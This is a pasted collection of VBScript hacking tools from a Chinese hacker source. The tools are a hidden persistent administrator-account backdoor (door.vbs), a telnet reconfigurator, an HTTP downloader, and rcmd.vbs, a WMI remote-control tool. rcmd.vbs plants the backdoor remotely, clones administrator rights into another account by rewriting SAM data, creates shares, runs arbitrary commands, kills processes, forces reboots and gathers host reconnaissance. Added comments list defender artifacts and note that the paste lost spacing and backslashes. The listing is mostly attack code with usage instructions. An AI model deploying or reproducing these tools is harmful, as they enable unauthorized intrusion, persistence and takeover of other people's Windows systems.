1.door.vbs
'***************
'door.vbsby黑嘿黑
'***************
' door.vbs as pasted: token spacing and registry-path backslashes were lost in the
' copy, so the listing is not runnable as shown. What the visible statements do:
'  - FA.Attributes=34 marks the script's own file hidden + system (2 + 32);
'  - two wsh.run calls create a local account named IUSE_SERVER (net user ... /add)
'    and put it in the local administrators group;
'  - Regwrite stores the script path under the HKLM ...\CurrentVersion\Run value
'    "Win32" and under the HKLM and HKCU "Command Processor\AutoRun" values, so it is
'    re-run at logon and every time cmd.exe starts;
'  - the Explorer Advanced\Folder\Hidden\SHOWALL "CheckedValue" is set to 0, which
'    interferes with the "show hidden files and folders" option.
' Defender notes: the IUSE_SERVER account, the Run\Win32 value, both AutoRun values
' and the SHOWALL\CheckedValue change are the durable artifacts to audit for.
dimwsh,FA,FSO
setfso=CreateObject("Scripting.FileSystemObject")
SetFA=FSO.GetFile(WScript.scriptFullName)
' hidden (2) + system (32)
FA.Attributes=34
setwsh=CreateObject("WScript.Shell")
' hidden window (0), wait for completion (true)
wsh.run"netuserIUSE_SERVERxyhack.91i.net/add",0,true
wsh.run"netlocalgroupadministratorsIUSE_SERVER/add",0,true
' logon persistence: script path written to the Run key
wsh.Regwrite"HKLMSoftwareMicrosoftWindowsCurrentVersionRunWin32",""&FA&""
wsh.Regwrite
"HKLMSoftwareMicrosoftWindowsCurrentVersionexplorerAdvancedFolderHiddenSHOWALLCheckedValue",0,"REG_DWORD"
' cmd.exe persistence: AutoRun runs the script whenever a command processor starts
wsh.regwrite"HKEY_LOCAL_MACHINESoftwareMicrosoftCommandProcessorAutoRun",""&FA&""
wsh.regwrite"HKEY_CURRENT_USERSoftwareMicrosoftCommandProcessorAutoRun",""&FA&""
功能:添加不死帐号(随cmd启动而启动),在win下彻底隐藏。
使用:直接运行。
2.ntlm.vbs
'***************
'ntlm.vbsby黑嘿黑
'***************
' ntlm.vbs as pasted (spacing and backslashes lost). Writes two REG_DWORD values
' under HKLM\SOFTWARE\Microsoft\TelnetServer\1.0 from the command-line arguments:
' argument 0 -> "NTLM" (authentication mode), argument 1 -> "TelnetPort".
' No validation is done on either argument. Defender note: changes to these two
' values, especially a non-default TelnetPort, indicate telnet service tampering.
dimwsh
setwsh=CreateObject("WScript.Shell")
wsh.regwrite"HKLMSoftwareMicrosoftTelnetServer1.0NTLM",WScript.Arguments(0),"REG_DWORD"
wsh.regwrite"HKLMSoftwareMicrosoftTelnetServer1.0TelnetPort",WScript.Arguments(1),"REG_DWORD"
功能:自定义telnet的ntlm和端口。
使用:D:>ntml.vbs1999
3.iget.vbs
'***************************
'iget.vbsModby黑嘿黑
'***************************
' iget.vbs as pasted (spacing lost). Command-line HTTP downloader: fetches the URL
' in argument 0 with Microsoft.XMLHTTP (synchronous GET) and saves the response
' body to the path in argument 1 through an ADODB.Stream. Both arguments are
' lower-cased before use. Defender note: cscript/wscript spawning XMLHTTP plus a
' binary ADODB.Stream SaveToFile is a well-known script-downloader pattern.
SetxPost=CreateObject("Microsoft.XMLHTTP")
' third argument 0 = synchronous request
xPost.Open"GET",LCase(WScript.Arguments(0)),0
xPost.Send()
SetsGet=CreateObject("ADODB.Stream")
' Mode 3 = read/write, Type 1 = binary
sGet.Mode=3
sGet.Type=1
sGet.Open()
sGet.Write(xPost.responseBody)
' second argument 2 = overwrite an existing file
sGet.SaveToFileLCase(WScript.Arguments(1)),2
功能:命令行下下载http文件。
使用:D:>iget.vbshttp://xyhack.91i.net/vbs.rarvbs.rar
4.rcmd.vbs
'***************
'rcmd.vbsby黑嘿黑
'***************
' rcmd.vbs entry sequence (spacing lost in the paste). Errors are suppressed for
' the whole script by On Error Resume Next, so most failures surface only through
' the showerror/showerroronly helpers below. If the host is wscript.exe the script
' re-launches itself under "cmd.exe /k cscript //nologo", presumably so that
' StdIn/StdOut are usable. It then requires three arguments (target IP, user name,
' password), connects to the target's WMI root/cimv2 namespace with those
' credentials and requests extra privileges on the SWbemServices security object
' (WbemPrivilegeEnum values 23, 18, 7, 11 - remote shutdown, shutdown, security and
' system time respectively, to be verified against the enum). Everything else in
' the file runs over this single objswbemservices session.
' Defender notes: interactive WMI/DCOM logons with explicit credentials from an
' operator host, followed by Win32_Process.Create calls, are the observable trace.
onerrorresumenext
setoutstreem=wscript.stdout
setinstreem=wscript.stdin
' wscript.exe has no console; restart under cscript inside a cmd window
if(lcase(right(wscript.fullname,11))="wscript.exe")then
setobjShell=wscript.createObject("wscript.shell")
objShell.Run("cmd.exe/kcscript//nologo"&chr(34)&wscript.scriptfullname&chr(34))
endif
ifwscript.arguments.count<3then
usage()
wscript.echo"Notenoughparameters."
wscript.quit
endif
ipaddress=wscript.arguments(0)
username=wscript.arguments(1)
password=wscript.arguments(2)
usage()
outstreem.write"Conneting"&ipaddress&"...."
setobjlocator=createobject("wbemscripting.swbemlocator")'20
setobjswbemservices=objlocator.connectserver(ipaddress,"root/cimv2",username,password)
' extra token privileges requested on the remote WMI session
objswbemservices.security_.privileges.add23,true
objswbemservices.security_.privileges.add18,true
objswbemservices.security_.privileges.add7,true
objswbemservices.security_.privileges.add11,true
iferrornumber<>0then
wscript.echo"Error!"
callmain()
else
wscript.echo"OK!"
endif
callmain()
'***********************************************************
' door(): plants the door.vbs persistence script on the remote target. cmddoor is
' one long "cmd /c echo ... >> file" chain that writes %windir%\system32\svrer.vbs
' line by line through Win32_Process.Create, then a second Create runs it with
' cscript. The generated svrer.vbs: marks itself hidden+system, writes
' %windir%\system32\SYSTEM.bat (net user IUSE_SERVER ... /add, net localgroup
' administrators ... /add, attrib +h on itself), creates the IUSE_SERVER admin
' account directly as well, registers svrer.vbs under the Run\Win32 value and the
' HKLM/HKCU Command Processor\AutoRun values, sets SHOWALL\CheckedValue to 0, and
' schedules SYSTEM.bat with "at 20:00,20:10,20:20,20:30".
' Defender notes: svrer.vbs and SYSTEM.bat in system32, the IUSE_SERVER account,
' the Run/AutoRun values and recurring "at" jobs at those times are the artifacts.
' Several string lines below were wrapped mid-literal in the paste.
functiondoor()
outstreem.write"Creatingtheblankdoor.."
setobjinstproc=objswbemservices.get("win32_process")
' each "&& echo ... >> svrer.vbs" appends one line of the dropped script
cmddoor="cmd/cechodimwsh,FA,FSO,t>%windir%system32svrer.vbs"_
&"&&echosetfso=CreateObject(""Scripting.FileSystemObject"")>>%windir%system32svrer.vbs"_
&"&&echoSetFA=FSO.GetFile(WScript.scriptFullName)>>%windir%system32svrer.vbs"_
&"&&echoFA.Attributes=34>>%windir%system32svrer.vbs"_
&"&&echosett=fso.CreateTextFile(""%windir%system32SYSTEM.bat"",true)>>%windir%system32svrer.vbs"_
&"&&echot.WriteLine(""netuserIUSE_SERVERxyhack.91i.net/add"")>>%windir%system32svrer.vbs"_
&"&&echot.WriteLine(""netlocalgroupadministratorsIUSE_SERVER/add"")>>%windir%system32svrer.vbs"_
&"&&echot.WriteLine(""Attrib+h%windir%system32SYSTEM.bat"")>>%windir%system32svrer.vbs"_
&"&&echot.Close>>%windir%system32svrer.vbs"_
&"&&echosetwsh=CreateObject(""WScript.Shell"")>>%windir%system32svrer.vbs"_
&"&&echowsh.run""netuserIUSE_SERVERxyhack.91i.net/add"",0,true>>%windir%system32svrer.vbs"_
&"&&echowsh.run""netlocalgroupadministratorsIUSE_SERVER/add"",0,true>>%windir%system32svrer.vbs"_
&"&&echowsh.Regwrite
""HKLMSoftwareMicrosoftWindowsCurrentVersionRunWin32"",""%windir%system32svrer.vbs"">>%windir%system32svrer.vbs"_
&"&&echowsh.Regwrite
""HKLMSoftwareMicrosoftWindowsCurrentVersionexplorerAdvancedFolderHiddenSHOWALLCheckedValue"",0,""REG_DWORD"">>%win
dir%system32svrer.vbs"_
&"&&echowsh.regwrite""HKEY_LOCAL_MACHINESoftwareMicrosoftCommand
ProcessorAutoRun"",""%windir%system32svrer.vbs"">>%windir%system32svrer.vbs"_
&"&&echowsh.regwrite""HKEY_CURRENT_USERSoftwareMicrosoftCommand
ProcessorAutoRun"",""%windir%system32svrer.vbs"">>%windir%system32svrer.vbs"_
&"&&echowsh.run""cmd/cat20:00,20:10,20:20,20:30%windir%system32SYSTEM.bat"",0,true
>>%windir%system32svrer.vbs"
' first Create writes the file; second Create (after a pause) executes it
objinstproc.create(cmddoor)
showerror(err.number)
Wscript.Sleep(1500)
outstreem.write"Runingtheblankdoor.."
objinstproc.create("cmd/ccscript%windir%system32svrer.vbs")
showerror(err.number)
callmain()
endfunction
'***********************************************************
' ca(): "clone account" routine, run through the existing WMI session. It reads a
' user name and password from stdin, looks up that account's SID through
' Win32_UserAccount and derives an 8-digit zero-padded hex string (regname) from the
' SID's last component. It then drops two helper scripts on the target with
' Win32_Process.Create: %temp%\ca.vbs (rewrites SAM registry data for the chosen
' user from the Users\000001F4 entry via StdRegProv, then writes a completion flag
' to HKLM\SOFTWARE\Microsoft\Windows Script Host\Settings\caflag) and
' %temp%\getsys.vbs (registers ca.vbs as an "at 23:59" job, sets the system clock
' to 23:58:59.90, sleeps 1.1 s and restores the clock). The Schedule service is
' switched from Disabled to Manual and started if necessary and reverted afterwards,
' the flag is polled up to 20 times at 500 ms, the password is applied with
' "net user", and both helper files and the flag value are removed.
' Defender notes: Schedule-service start-mode changes, "at" job creation, abrupt
' system-time changes, writes to the SAM hive outside normal account management,
' the caflag value, and short-lived ca.vbs / getsys.vbs files in %temp%.
functionca()
Wscript.Echo"enterthecausername:"
causername=WScript.StdIn.Readline()
Wscript.Echo"enterthecapassword:"
capassword=WScript.StdIn.Readline()
outstreem.write"GettingSIDof"&causername&"...."
setcolinstsid=objswbemservices.execquery("select*fromwin32_useraccountwherename="&chr(34)&causername&chr(34))
foreachobjinstsidincolinstsid
strsid=objinstsid.sid
' last "-" separated component of the SID, rendered as 8 hex digits
sidflag=right(strsid,len(strsid)-instrrev(strsid,"-"))
strflag=cstr(hex(sidflag))
regname=string(8-len(strflag),"0")&strflag
next
ifstrsid=""then
wscript.echo"Error."&vbcrlf&"Usernameisnotexist."
callmain()
else
wscript.echo"OK!"
endif
outstreem.write"Prepairing.."
setobjinstproc=objswbemservices.get("win32_process")
showerroronly(err.number)
' helper 1: %temp%\ca.vbs (this line was garbled in the paste at "?name&")
cmdline="cmd/cechosetoreg=getobject(""winmgmts:rootdefault:stdregprov"")>%temp%ca.vbs"_
&"&&echooreg.getbinaryvalue^&h80000002,""SAMSAMDomainsAccountUsers00001F4"",""F"",uvalue>>%temp%ca.vbs"_
&"&&echooreg.setbinaryvalue^&h80000002,""SAMSAMDomainsAccountUsers"?name&""",""F"",uvalue>>%temp%ca.vbs"_
&"&&echosetsh=createobject(""wscript.shell"")>>%temp%ca.vbs"_
&"&&echosh.regwrite""HKLMSOFTWAREMicrosoftWindowsScriptHostSettingscaflag"",""1"">>%temp%ca.vbs"
objinstproc.create(cmdline)
showerroronly(err.number)
' helper 2: %temp%\getsys.vbs - "at" job plus a temporary system-clock change
cmdline="cmd/cechoatime=time>%temp%getsys.vbs"_
&"&&echosetsh=createobject(""wscript.shell"")>>%temp%getsys.vbs"_
&"&&echosh.run""cmd/cat23:59cscript%temp%ca.vbs"",0,true>>%temp%getsys.vbs"_
&"&&echosh.run""cmd/ctime23:58:59.90"",0,true>>%temp%getsys.vbs"_
&"&&echowscript.sleep(1100)>>%temp%getsys.vbs"_
&"&&echosh.run""cmd/ctime""^&atime,0,true>>%temp%getsys.vbs"
objinstproc.create(cmdline)
showerror(err.number)
outstreem.write"Processing."
' the "at" command depends on the Schedule service
setcolinstsvr=objswbemservices.execquery("select*fromwin32_servicewherename='schedule'")
showerroronly(err.number)
foreachobjinstsvrincolinstsvr
' flag1/flag2 remember what was changed so it can be reverted below
flag1=0
flag2=0
ifobjinstsvr.startmode="Disabled"then
objinstsvr.changestartmode("Manual")
flag1=1
endif
ifobjinstsvr.started=flasethen
errnumber=objinstsvr.startservice()
flag2=1
endif
showerroronly(err.number)
objinstproc.create("cmd/ccscript%temp%getsys.vbs")
showerroronly(err.number)
setobjinstreg=objlocator.connectserver(ipaddress,"root/default",username,password).get("stdregprov")
' poll the caflag value up to 20 times (about 10 s) for completion
fori=1to20
objinstreg.getstringvalue&h80000002,"SOFTWAREMicrosoftWindowsScriptHostSettings","caflag",svalue
ifsvalue="1"then
exitfor
else
wscript.sleep(500)
endif
next
objinstproc.create("netuser"&causername&""&capassword)
' restore the Schedule service to its previous state
ifflag1thenobjinstsvr.changestartmode("Disabled")
ifflag2thenobjinstsvr.stopservice()
next
ifsvalue<>"1"then
wscript.echo"Error."&vbcrlf&"Waitingtimeout."
else
showerror(err.number)
endif
' remove the helper files and the flag value
outstreem.write"CleanUp.."
objinstproc.create("cmd/cdel%temp%ca.vbs")
showerroronly(err.number)
objinstproc.create("cmd/cdel%temp%getsys.vbs")
showerroronly(err.number)
ifsvalue="1"thenobjinstreg.deletevalue&h80000002,"SOFTWAREMicrosoftWindowsScriptHostSettings","caflag"
showerror(err.number)
callmain()
endfunction
' showerroronly(errornumber): progress/error reporter for multi-step operations.
' If errornumber is non-zero it prints Err.Number (hex) and Err.Description and
' returns to the main menu; otherwise it writes a single "." as a progress tick
' (unlike showerror, which prints "OK!"). Note that the printed number comes from
' the global Err object, not from the errornumber argument.
functionshowerroronly(errornumber)
iferrornumberThen
wscript.echo"Error0x"&cstr(hex(err.number))&"."
iferr.description<>""then
wscript.echo"Errordescription:"&err.description&"."
endif
callmain()
else
outstreem.write"."
endif
endfunction
'***********************************************************
' share(): sub-menu for network shares on the target. Reads one line from stdin and
' dispatches: "quit"/"0" back to main, "list"/"1" listshare, "open"/"2" openshare,
' "close"/"3" closeshare. Any other input falls through and returns to the caller.
' Menu labels are in Chinese: 返回 = back, 列出共享信息 = list shares,
' 创建共享 = create share, 删除共享 = delete share.
functionshare()
Wscript.Echostring(18,"-")
Wscript.Echo"0.返回CMD>="
wscript.echo"1.列出共享信息:="
Wscript.Echo"2.创建共享="
Wscript.Echo"3.删除共享="
Wscript.Echostring(18,"-")
Wscript.Echo"pleasechosetheparameter:"
parameters=WScript.StdIn.Readline()
SelectCaseparameters
case"quit","0"
main()
case"list","1"
listshare()
case"open","2"'40
openshare()
case"close","3"
closeshare()
endSelect
endfunction
' listshare(): enumerates Win32_Share on the target and prints caption, name and
' path of every share, tab separated, then returns to the share sub-menu.
functionlistshare()
outstreem.write"ListingtheNetsharefrom"&ipaddress&"...."
SetcolShares=objswbemservices.ExecQuery("Select*fromWin32_Share")
showerror(err.number)'50
wscript.echo_
("Caption"&chr(9)&chr(9)&"Name:"&chr(9)&chr(9)&"Path")
ForeachobjShareincolShares
wscript.echo_
(objShare.Caption&chr(9)&objShare.Name&chr(9)&chr(9)&objShare.Path)
Next
wscript.echovbcrlf&"AllSharehavebeenlistedSuccessfully!"
callshare()
endfunction
' openshare(): creates a new disk share on the target via Win32_Share.Create using
' a path and share name read from stdin. FILE_SHARE=0 is the disk-drive share type,
' MAXIMUM_CONNECTIONS=25 the connection limit, and the share description is the
' Chinese string "默认共享" ("default share"). The return code in errReturn is never
' checked; the success message is printed unconditionally.
' Defender note: a share whose description is "默认共享" is a distinctive artifact.
functionopenshare()
wscript.echo"Enterthepath:"'70
path=WScript.StdIn.Readline()
wscript.echo"Enterthename:"
sname=WScript.StdIn.Readline()
ConstFILE_SHARE=0
ConstMAXIMUM_CONNECTIONS=25
SetobjNewShare=objswbemservices.Get("Win32_Share")
errReturn=objNewShare.Create_
(path,sname,FILE_SHARE,_
MAXIMUM_CONNECTIONS,"默认共享")
wscript.echo"ThenSharehavebeenCeatedSuccessfully!"
callshare()
endfunction
' closeshare(): deletes the share whose name is read from stdin. The name is spliced
' into the WQL query inside single quotes without escaping, so a name containing a
' quote would break the query (input comes from the operator, not a remote party).
functioncloseshare()
wscript.echo"PleseEnterThename:"
kname=WScript.StdIn.Readline()
outstreem.write"killingthe"&kname&"...."
SetcolShares=objswbemservices.ExecQuery_
("Select*fromWin32_ShareWhereName="&"'"&kname&"'")
ForEachobjShareincolShares
objShare.Delete
Next
showerror(err.number)
callshare()
endfunction
'***********************************************************
' listsvr(): lists every Win32_Service on the target as a tab-separated table of
' name, state, start mode and path name. Names shorter than 8 characters get an
' extra tab so the columns line up. Returns to the main menu when done.
functionlistsvr()
outstreem.write"ListingtheServicefrom"&ipaddress&"...."
SetcolListOfServices=objswbemservices.ExecQuery_
("Select*fromWin32_Service")
showerror(err.number)
wscript.echo_
("Name"&chr(9)&chr(9)&"State"&chr(9)&chr(9)&"Mode"&chr(9)&"PathName")
ForEachobjServiceincolListOfServices
' pad short names with a second tab for column alignment
iflen(objService.name)<8then
strname=objService.name&chr(9)
else
strname=objService.name
endif
wscript.echo_
(strname&chr(9)&objService.State&chr(9)&chr(9)&objService.StartMode&chr(9)&objService.PathName)
Next
wscript.echovbcrlf&"AllServiceshavebeenlistedSuccessfully!"
callmain()
endfunction
'************************************************************
' reboot(): restarts the target through Win32_OperatingSystem.Win32Shutdown(6),
' i.e. reboot (2) + forced (4); the remote-shutdown privilege requested at connect
' time is what makes this possible. Defender note: a forced remote restart shows
' up as an unexpected shutdown/restart event initiated over WMI.
functionreboot()
outstreem.write"Now,restartingtarget...."
strwqlquery="select*fromwin32_operatingsystemwhereprimary='true'"
setcolinstances=objswbemservices.execquery(strwqlquery)
foreachobjinstanceincolinstances
' 6 = EWX_REBOOT (2) OR EWX_FORCE (4)
objinstance.win32shutdown(6)
next
showerror(err.number)
callmain()
endfunction
'*************************************************************
' inf(): host-reconnaissance report. Pulls a series of WMI classes from the target
' (computer system, operating system, processor, memory configuration, BIOS, display,
' disk drives, logical disks, IP-enabled network adapters, hotfixes) and prints
' them through wnl. Finally it opens root/default, reads the DisplayName of every
' subkey under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall through
' StdRegProv, sorts the names case-insensitively with a bubble sort, and lists them.
' Helper functions objget, wnl, wfl, wsp, timeformat and sizeformat are defined
' below this function. Note that the closing message on the last line contains
' "&ipaddress&" inside the string literal, so it prints the text verbatim.
functioninf()
outstreem.write"GettingInfomationfrom"&ipaddress&"...."
setobj1=objget("win32_computersystem")
showerror(err.number)
wscript.echo""&vbcrlf
setobj2=objget("win32_operatingsystem")
setcol3=objswbemservices.instancesof("win32_processor")
setobj4=objget("win32_logicalmemoryconfiguration")
setobj5=objget("win32_bios")
setobj6=objget("win32_displayconfiguration")
setcol7=objswbemservices.instancesof("win32_diskdrive")
setcol8=objswbemservices.instancesof("win32_logicaldisk")
setcol9=objswbemservices.instancesof("win32_networkadapterconfiguration")
setcol10=objswbemservices.instancesof("win32_quickfixengineering")
wnl"OSInfo:"
wnl"ComputerName:"&obj1.name
wnl"UserName:"&obj1.username
wnl"Domain:"&obj1.domain
' Win32_ComputerSystem.DomainRole codes 0-5 mapped to labels
domainrole=""
selectcaseobj1.domainrole
case0
domainrole="Workstation"
case1
domainrole="MemberWorkstation"
case2
domainrole="Server"
case3
domainrole="MemberServer"
case4
domainrole="BackupDomainController"
case5
domainrole="MainDomainController"
endselect
withobj2
wnl"DomainRole:"&domainrole
wnl"Caption:"&.caption
wnl"Organization:"&.organization
wnl"RegisteredUser:"&.registereduser
wnl"InstallDate:"&timeformat(.installdate)
wnl"LastBootUpTime:"&timeformat(.lastbootuptime)
wnl"WindowsDirectory:"&.windowsdirectory
wnl"SystemDirectory:"&.systemdirectory
wnl"BootDevice:"&.bootdevice
wnl"CountryCode:"&.countrycode
wnl"CSName:"&.csname
wnl"Description:"&.description
wnl"Manufacturer:"&.manufacturer
wnl"SerialNumber:"&.serialnumber
wnl"Version:"&.version
wnl"SystemType:"&obj1.systemtype
wnl"SystemStartupDelay:"&obj1.systemstartupdelay&"s"
' first startup option on the label line, the rest indented underneath
wnl"SystemStartupOptions:"&obj1.systemstartupoptions(0)
fori=1toubound(obj1.systemstartupoptions)
wnlspace(28)&obj1.systemstartupoptions(i)
next
endwith
wnlvbcrlf&"ProcessorInfo:"
wnl"NumberOfProcessors:"&obj1.numberofprocessors
foreachobj3incol3
withobj3
wnl"DeviceID:"&.deviceid
wnl"Name:"&.name
wnl"CurrentClockSpeed:"&.currentclockspeed&"MHz"
wnl"Description:"&.description
wnl"ExtClock:"&.extclock&"MHz"
wnl"L2CacheSize:"&.l2cachesize&"KB"
wnl"L2CacheSpeed:"&.l2cachespeed&"MHz"
wnl"ProcessorId:"&.processorid
wnl"Manufacturer:"&.manufacturer
wnl"SocketDesignation:"&.socketdesignation
wnl"AddressWidth:"&.addresswidth&"Bit"
wnl"DataWidth:"&.datawidth&"Bit"
endwith
next
' memory values are reported in KB by WMI; /1024 gives MB
withobj4
wnlvbcrlf&"MemoryInfo:"
wnl"TotalPhysicalMemory:"&cint(.totalphysicalmemory/1024)&"MB"
wnl"FreePhysicalMemory:"&cint(obj2.freephysicalmemory/1024)&"MB"
wnl"TotalPageFileSpace:"&cint(.totalpagefilespace/1024)&"MB"
wnl"TotalVirtualMemory:"&cint(.totalvirtualmemory/1024)&"MB"
wnl"AvailableVirtualMemory:"&cint(.availablevirtualmemory/1024)&"MB"
endwith
wnlvbcrlf&"BIOSInfo:"
wnl"Description:"&obj5.description
wnl"CurrentLanguage:"&obj5.currentlanguage
wnl"Version:"&obj5.version
wnl"Manufacturer:"&obj5.manufacturer
withobj6
wnlvbcrlf&"DisplayConfiguration:"
wnl"Caption:"&.caption
wnl"DeviceName:"&.devicename
wnl"DriverVersion:"&.driverversion
wnl"DisplayFrequency:"&.displayfrequency&"Hz"
wnl"BitsPerPel:"&.bitsperpel&"Bit"
wnl"Pels:"&.pelswidth&"x"&.pelsheight
endwith
wnlvbcrlf&"DiskInfo:"
foreachobj7incol7
withobj7
wnl"DeviceID:"&.deviceid
wnl"Caption:"&.caption
wnl"InterfaceType:"&.interfacetype
wnl"SCSIBus:"&.scsibus
wnl"SCSILogicalUnit:"&.scsilogicalunit
wnl"SCSIPort:"&.scsiport
wnl"SCSITargetId:"&.scsitargetid
wnl"SectorsPerTrack:"&.sectorspertrack&"KB"
wnl"Partitions:"&.partitions
wnl"Size:"&sizeformat(.size)
endwith
next
' fixed-width logical-disk table; column widths are passed to wsp below
str="Volume"+space(2)+"Type"+space(8)+"Format"+space(4)
str=str+"Size"+space(6)+"Free"+space(12)+"Label"
wnlstr
foreachobj8incol8
withobj8
' Win32_LogicalDisk.DriveType codes 0-6 mapped to labels
drivetype=""
selectcase.drivetype
case0
drivetype="Unknow"
case1
drivetype="NoRootDir"
case2
drivetype="Removable"
case3
drivetype="Fixed"
case4
drivetype="Network"
case5
drivetype="CD-ROM"
case6
drivetype="RAM"
endselect
strpercent=""
if.size<>""and.freespace<>""then
strpercent="("&formatpercent(.freespace/.size,0)&")"
endif
str=""&wsp(.caption,8)&wsp(drivetype,12)&wsp(.filesystem,10)&wsp(sizeformat(.size),10)
str=str&wsp(sizeformat(.freespace)&strpercent,16)&.volumename
wnlstr
endwith
next
wnlvbcrlf&"NICInformaton:"
foreachobj9incol9
withobj9
' only adapters with IP bound are reported; array properties go through wfl
if.IPEnabledthen
wnl"Index:"&.index
wnl"Description:"&.description
wnl"DHCPEnabled:"&.dhcpenabled
wnl"DHCPServer:"&.dhcpserver
wnl"DNSHostName:"&.dnshostname
wnl"DNSServerSearchOrder:"&wfl(.dnsserversearchorder)
wnl"WINSPrimaryServer:"&.winsprimaryserver
wnl"IPAddress:"&wfl(.ipaddress)
wnl"MACAddress:"&.macaddress
wnl"DefaultIPGateway:"&wfl(.defaultipgateway)
wnl"IPSubnet:"&wfl(.ipsubnet)
wnl"IPFilterSecurityEnabled:"&.ipfiltersecurityenabled
wnl"IPSecPermitIPProtocols:"&wfl(.ipsecpermitipprotocols)
wnl"IPSecPermitTCPPorts:"&wfl(.ipsecpermittcpports)
wnl"IPSecPermitUDPPorts:"&wfl(.ipsecpermitudpports)
endif
endwith
next
wnlvbcrlf&"HotFixesInfo:"
foreachobj10incol10
wnl"HotFixID:"&obj10.hotfixid
wnl"FixComments:"&obj10.fixcomments
wnl"InstallDate:"&obj10.installdate
wnl"ServicePackInEffect:"&obj10.servicepackineffect
next
wnlvbcrlf&"Applications:"
' installed applications: DisplayName of each Uninstall subkey, read via StdRegProv
setobjswb1=objlocator.connectserver(ipaddress,"root/default",username,password)
setobj11=objswb1.get("stdregprov")
HKLM=&h80000002
keypath="SOFTWAREMicrosoftWindowsCurrentVersionUninstall"
obj11.enumkeyHKLM,keypath,keyarray
redimstr(ubound(keyarray)+1)
j=0
fori=0toubound(keyarray)
obj11.getstringvalueHKLM,keypath+keyarray(i),"displayname",strvalue
ifstrvalue<>""then
str(j)=strvalue
j=j+1
endif
next
' bubble sort, case-insensitive (strcomp mode 1)
ifj>1then
fori=0toj-1
fork=0toj-i-1
ifstrcomp(str(k),str(k+1),1)=1then
strtemp=str(k+1)
str(k+1)=str(k)
str(k)=strtemp
endif
next
next
endif
fori=0toj-1
wnl""&str(i)
next
wscript.echo""&vbcrlf
wscript.echo"TheInfomationfrom&ipaddress&hadbeenlistedSuccessfully!"
callmain()
endfunction
' wnl(msg): "write new line" - echoes msg to the console and, if a global object
' named "of" exists, also writes the line to it. Nothing in the visible source
' assigns "of", so the file-output branch appears to be unused here (presumably a
' hook for a log file in another version - verify against the full script).
subwnl(msg)
wscript.echomsg
ifisobject(of)then
onerrorresumenext
of.writelinemsg
showerror()
onerrorgoto0
endif
endsub
' wfl(obj): "write from list" - joins the elements of a 0-based array into one
' string (the separator string literal is empty as pasted; it was probably a space
' before the spacing was stripped). Used for WMI array properties such as
' IPAddress and DNSServerSearchOrder.
functionwfl(byrefobj)
str=""
fori=0toubound(obj)
str=str&obj(i)&""
next
wfl=str
endfunction
' wsp(msg, num): pads or truncates msg to a fixed column width of num characters.
' A non-empty msg is cut to num-1 characters and space-filled on the right; an
' empty msg yields num spaces. Note that msg is modified in place (passed ByRef by
' default in VBScript), which matters only if the caller passes a variable.
functionwsp(msg,num)
ifmsg<>""then
msg=left(msg,num-1)
wsp=msg&space(num-len(msg))
else
wsp=space(num)
endif
endfunction
' timeformat(msg): reformats a WMI CIM_DATETIME string (yyyymmddHHMMSS...) as
' "yyyy/mm/dd HH:MM:SS". The date/time separator literal is empty as pasted, so
' the date and time run together in this copy.
functiontimeformat(msg)
timeformat=left(msg,4)&"/"&mid(msg,5,2)&"/"&mid(msg,7,2)&""&mid(msg,9,2)&":"&mid(msg,11,2)&":"&mid(msg,13,2)
endfunction
' sizeformat(msg): converts a byte count to a human-readable string - "x.xx GB"
' when the value exceeds 1024 MB, otherwise "x.x MB". An empty msg leaves the
' return value Empty (prints as an empty string).
functionsizeformat(msg)
ifmsg<>""then
' 1048576 = 1024*1024, bytes to MB
size=msg/1048576
ifsize>1024then
sizeformat=round(size/1024,2)&"GB"
else
sizeformat=round(size,1)&"MB"
endif
endif
endfunction
' objget(msg): returns the last instance of the WMI class named msg from the
' current objswbemservices session (the loop overwrites obj on every iteration, so
' for multi-instance classes only the final one is kept). Intended for singleton
' classes such as Win32_ComputerSystem and Win32_OperatingSystem.
functionobjget(msg)
setcol=objswbemservices.instancesof(msg)
foreachobjxincol
setobj=objx
next
setobjget=obj
endfunction
'******************************************
' command(): prompt for the remote-command loop; prints the prompt and hands off
' to run(), which reads the line and executes it on the target.
functioncommand()
wscript.echo"PleseEnterTheCommand:"
callrun()
endfunction
' run(): reads one command line from stdin and launches it on the target through
' Win32_Process.Create (ExecMethod_ with a CommandLine in-parameter). "exit",
' "quit" or "0" return to the main menu. A non-zero ReturnValue prints "Error!"
' and re-prompts; otherwise the new process id is printed. No output of the remote
' process is captured - the process simply runs on the target.
' Defender note: each use is a Win32_Process.Create over DCOM from the operator
' host; the created process has the WMI provider host (wmiprvse) as parent.
functionrun()
strcmdline=WScript.StdIn.Readline()
ifstrcmdline="exit"orstrcmdline="quit"orstrcmdline="0"then
callmain()
endif
outstreem.write"Runningthecommand...."
setobjinstance=objswbemservices.get("win32_process")
setobjmethod=objinstance.methods_("create")
setobjinparam=objmethod.inparameters.spawninstance_()
objinparam.commandline=strcmdline
setobjoutparam=objinstance.execmethod_("create",objinparam)
ifobjoutparam.returnvalue<>0then
wscript.echo"Error!"
callcommand()
else
wscript.echo"OK!"
endif
wscript.echo"TheProcessIDis"&objoutparam.processid
wscript.echo"Runingcommand:"&strcmdline&".to"&ipaddress&"Successfully!"&vbcrlf
callcommand()
endfunction
'*******************************************
' pslist(): lists every Win32_Process on the target as a tab-separated table of
' name, handle (process id) and executable path. Names shorter than 8 characters
' get an extra tab for alignment. Returns to the main menu when done.
functionpslist()
outstreem.write"Listingprocess...."
setcolinstances=objswbemservices.execquery("select*fromwin32_process")
showerror(err.number)
wscript.echovbcrlf&"Name"&chr(9)&chr(9)&"Pid"&chr(9)&"ExecutablePath"
foreachobjinstanceincolinstances
' pad short names with a second tab for column alignment
iflen(objinstance.name)<8then
strname=objinstance.name&chr(9)
else
strname=objinstance.name
endif
' Win32_Process.Handle holds the process id as a string
wscript.echostrname&chr(9)&objinstance.handle&chr(9)&objinstance.executablepath
next
wscript.echovbcrlf&"AllprocesshavebeenlistedSuccessfully!"
callmain()
endfunction
'*****************************************
' pskill(): terminates a process on the target by id. The id read from stdin is
' spliced into the Win32_Process.Handle='...' object path; if Get returns a
' non-object (process not found under On Error Resume Next) an error is printed,
' otherwise the Terminate method is invoked with Reason=0 and its return value is
' passed to showerror.
functionpskill()
wscript.echo"pleseentertheprocess'sid:"
strprocess=WScript.StdIn.Readline()
outstreem.write"Killingid="&strprocess&"process...."
setobjinstance=objswbemservices.get("win32_process.handle="&"'"&strprocess&"'")
' Get fails silently under On Error Resume Next; detect a missing process by type
ifvartype(objinstance)<>vbobjectthen
wscript.echovbcrlf&"Specifiedprocessisnotexist."
callmain()
else
